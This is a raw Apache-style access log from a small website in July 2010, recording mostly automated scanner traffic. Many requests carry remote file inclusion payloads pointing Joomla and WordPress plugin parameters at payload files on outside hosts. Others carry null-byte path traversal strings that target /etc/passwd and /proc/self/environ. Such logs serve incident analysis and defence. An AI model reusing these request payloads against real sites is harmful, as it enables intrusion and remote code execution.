94.143.220.3 - - [22/Jul/2010:09:55:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:55:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
94.143.220.3 - - [22/Jul/2010:09:55:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.redneckmba.com"
211.202.2.34 - - [22/Jul/2010:09:57:05 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
216.129.119.47 - - [22/Jul/2010:10:04:41 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "redneckmba.com"
76.13.114.106 - - [22/Jul/2010:10:06:54 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [22/Jul/2010:10:08:00 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
83.14.78.194 - - [22/Jul/2010:10:24:26 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://faci.obihiro.ac.jp/download/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.14.78.194 - - [22/Jul/2010:10:24:27 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://faci.obihiro.ac.jp/download/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
203.198.154.105 - - [22/Jul/2010:10:28:19 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://faci.obihiro.ac.jp/download/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
203.198.154.105 - - [22/Jul/2010:10:28:19 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://faci.obihiro.ac.jp/download/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.97.216.92 - - [22/Jul/2010:10:29:17 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kuroretasu.jp/docs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.97.216.92 - - [22/Jul/2010:10:29:18 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kuroretasu.jp/docs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
87.229.26.132 - - [22/Jul/2010:10:29:24 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kuroretasu.jp/docs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
87.229.26.132 - - [22/Jul/2010:10:29:24 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kuroretasu.jp/docs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
211.202.2.34 - - [22/Jul/2010:10:30:00 -0700] "GET /logs/access_100607.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
211.202.2.34 - - [22/Jul/2010:10:30:01 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
211.202.2.34 - - [22/Jul/2010:10:30:01 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mymw.info//ul.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
218.149.84.110 - - [22/Jul/2010:10:34:37 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kuroretasu.jp/docs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
218.149.84.110 - - [22/Jul/2010:10:34:38 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kuroretasu.jp/docs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
70.85.233.82 - - [22/Jul/2010:10:45:45 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.redneckmba.com"
70.85.233.82 - - [22/Jul/2010:10:45:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.redneckmba.com"
64.15.156.75 - - [22/Jul/2010:10:46:39 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [22/Jul/2010:10:46:39 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [22/Jul/2010:10:46:39 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.85.233.82 - - [22/Jul/2010:10:48:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.redneckmba.com"
70.85.233.82 - - [22/Jul/2010:10:48:57 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.redneckmba.com"
70.85.233.82 - - [22/Jul/2010:10:48:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.redneckmba.com"
70.85.233.82 - - [22/Jul/2010:10:48:57 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.redneckmba.com"
110.138.208.125 - - [22/Jul/2010:10:50:13 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
110.138.208.125 - - [22/Jul/2010:10:50:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
189.14.103.146 - - [22/Jul/2010:10:51:09 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
189.14.103.146 - - [22/Jul/2010:10:51:10 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
189.14.103.146 - - [22/Jul/2010:10:51:10 -0700] "GET /logs/access_100607.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
189.14.103.146 - - [22/Jul/2010:10:52:02 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
189.14.103.146 - - [22/Jul/2010:10:52:02 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
189.14.103.146 - - [22/Jul/2010:10:52:02 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [22/Jul/2010:10:54:16 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [22/Jul/2010:10:54:16 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [22/Jul/2010:10:54:17 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [22/Jul/2010:10:54:33 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [22/Jul/2010:10:54:33 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [22/Jul/2010:10:54:33 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
110.138.208.125 - - [22/Jul/2010:10:54:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
119.192.145.134 - - [22/Jul/2010:10:55:20 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [22/Jul/2010:10:55:21 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [22/Jul/2010:10:55:21 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
70.85.233.82 - - [22/Jul/2010:10:56:30 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.redneckmba.com"
70.85.233.82 - - [22/Jul/2010:10:56:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.redneckmba.com"
70.85.233.82 - - [22/Jul/2010:10:56:31 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.redneckmba.com"
200.17.53.5 - - [22/Jul/2010:10:59:57 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.17.53.5 - - [22/Jul/2010:11:00:00 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.17.53.5 - - [22/Jul/2010:11:00:00 -0700] "GET /logs/access_100607.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
207.46.199.185 - - [22/Jul/2010:11:00:28 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
66.163.171.205 - - [22/Jul/2010:11:01:24 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
189.14.103.146 - - [22/Jul/2010:11:02:37 -0700] "GET /logs/access_100607.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
189.14.103.146 - - [22/Jul/2010:11:02:37 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
189.14.103.146 - - [22/Jul/2010:11:02:37 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oklsdioj.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.123.194 - - [22/Jul/2010:11:04:48 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [22/Jul/2010:11:12:31 -0700] "GET /blog/?feed=rss2 HTTP/1.0" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
70.85.233.82 - - [22/Jul/2010:11:13:15 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.redneckmba.com"
72.14.192.67 - - [22/Jul/2010:11:15:43 -0700] "GET /logs/access_100308.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp),gzip(gfe) (via docs.google.com/viewer)" "www.redneckmba.com"
93.158.149.32 - - [22/Jul/2010:11:51:44 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.redneckmba.com"
91.191.136.210 - - [22/Jul/2010:11:55:33 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.redneckmba.com"
91.191.136.210 - - [22/Jul/2010:11:55:34 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.169.163 - - [22/Jul/2010:11:55:43 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.169.163 - - [22/Jul/2010:11:55:44 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
194.149.14.77 - - [22/Jul/2010:11:55:56 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.redneckmba.com"
194.149.14.77 - - [22/Jul/2010:11:55:56 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
89.200.169.163 - - [22/Jul/2010:11:56:13 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.169.163 - - [22/Jul/2010:11:56:13 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
84.242.142.98 - - [22/Jul/2010:12:08:01 -0700] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
84.242.142.98 - - [22/Jul/2010:12:08:02 -0700] "GET /logs/access.log//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
84.242.142.98 - - [22/Jul/2010:12:08:02 -0700] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
84.242.142.98 - - [22/Jul/2010:12:08:03 -0700] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:08:32 -0700] "GET /logs/access_100607.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:08:32 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:08:32 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:09:02 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:09:05 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:09:05 -0700] "GET /logs/access_100607.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
84.242.142.98 - - [22/Jul/2010:12:09:41 -0700] "GET /logs/access_100614.log//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:12:34 -0700] "GET /logs/access_100607.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:12:34 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:12:34 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:12:48 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:12:48 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
96.0.251.231 - - [22/Jul/2010:12:12:48 -0700] "GET /logs/access_100607.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.123.195 - - [22/Jul/2010:12:12:50 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
84.242.142.98 - - [22/Jul/2010:12:13:36 -0700] "GET /logs/access.log//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
84.242.142.98 - - [22/Jul/2010:12:13:37 -0700] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
84.242.142.98 - - [22/Jul/2010:12:13:37 -0700] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
66.163.171.206 - - [22/Jul/2010:12:14:27 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
212.154.246.147 - - [22/Jul/2010:12:17:37 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.823" "www.redneckmba.com"
212.154.246.147 - - [22/Jul/2010:12:17:38 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.823" "www.redneckmba.com"
76.13.114.105 - - [22/Jul/2010:12:17:44 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.200.170.145 - - [22/Jul/2010:12:19:24 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.170.145 - - [22/Jul/2010:12:19:24 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.redneckmba.com"
216.15.238.210 - - [22/Jul/2010:12:20:02 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "redneckmba.com"
89.97.199.132 - - [22/Jul/2010:12:20:37 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.69" "www.redneckmba.com"
89.97.199.132 - - [22/Jul/2010:12:20:38 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.69" "www.redneckmba.com"
89.97.199.132 - - [22/Jul/2010:12:24:11 -0700] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.69" "www.redneckmba.com"
89.97.199.132 - - [22/Jul/2010:12:24:12 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.69" "www.redneckmba.com"
94.103.157.130 - - [22/Jul/2010:12:25:46 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
94.103.157.130 - - [22/Jul/2010:12:25:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
94.103.157.130 - - [22/Jul/2010:12:29:11 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
94.103.157.130 - - [22/Jul/2010:12:29:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
94.103.157.130 - - [22/Jul/2010:12:29:11 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
216.15.238.210 - - [22/Jul/2010:12:31:11 -0700] "POST /logs/access_100607.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "redneckmba.com"
216.15.238.210 - - [22/Jul/2010:12:31:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "redneckmba.com"
216.15.238.210 - - [22/Jul/2010:12:31:12 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "redneckmba.com"
94.103.157.130 - - [22/Jul/2010:12:39:12 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
